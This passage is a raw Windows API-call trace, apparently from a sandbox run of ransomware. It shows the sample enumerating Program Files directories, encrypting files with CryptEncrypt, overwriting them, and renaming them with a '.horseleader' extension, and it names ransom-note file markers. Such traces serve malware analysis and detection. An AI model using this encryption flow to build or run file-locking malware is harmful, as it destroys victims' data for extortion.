[0252.058] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.058] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93776350, ftCreationTime.dwHighDateTime=0x1d5a768, ftLastAccessTime.dwLowDateTime=0xa8f83b60, ftLastAccessTime.dwHighDateTime=0x1d59dcb, ftLastWriteTime.dwLowDateTime=0xa8f83b60, ftLastWriteTime.dwHighDateTime=0x1d59dcb, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="accupos.exe", cAlternateFileName="")) returned 1 [0252.058] lstrcmpiW (lpString1="accupos.exe", lpString2="Windows") returned -1 [0252.058] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe") returned 60 [0252.058] StrStrIW (lpFirst="accupos.exe", lpSrch=".horseleader") returned 0x0 [0252.058] lstrcmpW (lpString1="accupos.exe", lpString2="#Decrypt#.txt") returned 1 [0252.058] lstrcmpW (lpString1="accupos.exe", lpString2="_uninstalling_.png") returned 1 [0252.058] lstrlenW (lpString=".testttjffg") returned 11 [0252.058] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe", lpSrch=".testttjffg") returned 0x0 [0252.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\accupos.exe" (normalized: "c:\\program files\\microsoft analysis services\\accupos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.059] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="AS OLEDB", cAlternateFileName="ASOLED~1")) returned 1 [0252.059] lstrcmpiW (lpString1="AS OLEDB", lpString2="Windows") returned -1 [0252.059] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB") returned 57 [0252.059] lstrcmpW (lpString1="AS OLEDB", lpString2=".") returned 1 [0252.059] lstrcmpW (lpString1="AS OLEDB", lpString2="..") returned 1 [0252.059] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.059] GetProcessHeap () returned 0x780000 [0252.059] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.059] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*") returned 59 [0252.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.060] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.060] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\.") returned 59 [0252.060] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.060] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.060] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\..") returned 60 [0252.060] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.060] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="10", cAlternateFileName="")) returned 1 [0252.061] lstrcmpiW (lpString1="10", lpString2="Windows") returned -1 [0252.061] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10") returned 60 [0252.061] lstrcmpW (lpString1="10", lpString2=".") returned 1 [0252.061] lstrcmpW (lpString1="10", lpString2="..") returned 1 [0252.061] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.061] GetProcessHeap () returned 0x780000 [0252.061] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.061] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*") returned 62 [0252.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0252.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.063] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\.") returned 62 [0252.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.063] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0252.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.064] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\..") returned 63 [0252.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.064] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0252.064] lstrcmpiW (lpString1="Cartridges", lpString2="Windows") returned -1 [0252.064] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned 71 [0252.064] lstrcmpW (lpString1="Cartridges", lpString2=".") returned 1 [0252.064] lstrcmpW (lpString1="Cartridges", lpString2="..") returned 1 [0252.064] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.064] GetProcessHeap () returned 0x780000 [0252.064] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.064] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*") returned 73 [0252.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0252.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\.") returned 73 [0252.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.067] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0252.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\..") returned 74 [0252.067] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.067] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.067] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0252.067] lstrcmpiW (lpString1="as80.xsl", lpString2="Windows") returned -1 [0252.067] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0252.067] StrStrIW (lpFirst="as80.xsl", lpSrch=".horseleader") returned 0x0 [0252.067] lstrcmpW (lpString1="as80.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.067] lstrcmpW (lpString1="as80.xsl", lpString2="_uninstalling_.png") returned 1 [0252.068] lstrlenW (lpString=".testttjffg") returned 11 [0252.068] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", lpSrch=".testttjffg") returned 0x0 [0252.068] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.068] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 80 [0252.068] StrStrW (lpFirst="as80.xsl", lpSrch=".txt") returned 0x0 [0252.069] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=17248) returned 1 [0252.069] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4360, lpOverlapped=0x0) returned 1 [0252.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbca0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4360, lpOverlapped=0x0) returned 1 [0252.071] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.071] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.072] CloseHandle (hObject=0x1a4) returned 1 [0252.072] GetProcessHeap () returned 0x780000 [0252.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.072] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.horseleader") returned 92 [0252.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.horseleader")) returned 1 [0252.073] GetProcessHeap () returned 0x780000 [0252.073] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.073] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0252.073] lstrcmpiW (lpString1="as90.xsl", lpString2="Windows") returned -1 [0252.073] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0252.073] StrStrIW (lpFirst="as90.xsl", lpSrch=".horseleader") returned 0x0 [0252.073] lstrcmpW (lpString1="as90.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.073] lstrcmpW (lpString1="as90.xsl", lpString2="_uninstalling_.png") returned 1 [0252.073] lstrlenW (lpString=".testttjffg") returned 11 [0252.073] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", lpSrch=".testttjffg") returned 0x0 [0252.073] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.074] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 80 [0252.075] StrStrW (lpFirst="as90.xsl", lpSrch=".txt") returned 0x0 [0252.075] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18738) returned 1 [0252.076] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4932, lpOverlapped=0x0) returned 1 [0252.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb6ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.079] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4932, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4932, lpOverlapped=0x0) returned 1 [0252.079] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.080] CloseHandle (hObject=0x1a4) returned 1 [0252.080] GetProcessHeap () returned 0x780000 [0252.080] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.080] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.horseleader") returned 92 [0252.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.horseleader")) returned 1 [0252.082] GetProcessHeap () returned 0x780000 [0252.082] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.082] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x78e4, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0252.082] lstrcmpiW (lpString1="Informix.xsl", lpString2="Windows") returned -1 [0252.082] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0252.082] StrStrIW (lpFirst="Informix.xsl", lpSrch=".horseleader") returned 0x0 [0252.082] lstrcmpW (lpString1="Informix.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.082] lstrcmpW (lpString1="Informix.xsl", lpString2="_uninstalling_.png") returned 1 [0252.082] lstrlenW (lpString=".testttjffg") returned 11 [0252.082] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", lpSrch=".testttjffg") returned 0x0 [0252.082] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.082] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl") returned 84 [0252.084] StrStrW (lpFirst="Informix.xsl", lpSrch=".txt") returned 0x0 [0252.084] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=30948) returned 1 [0252.084] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.087] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.087] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.088] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x28e4, lpOverlapped=0x0) returned 1 [0252.088] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd71c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.088] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x28e4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x28e4, lpOverlapped=0x0) returned 1 [0252.089] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.089] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.089] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.089] CloseHandle (hObject=0x1a4) returned 1 [0252.089] GetProcessHeap () returned 0x780000 [0252.089] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 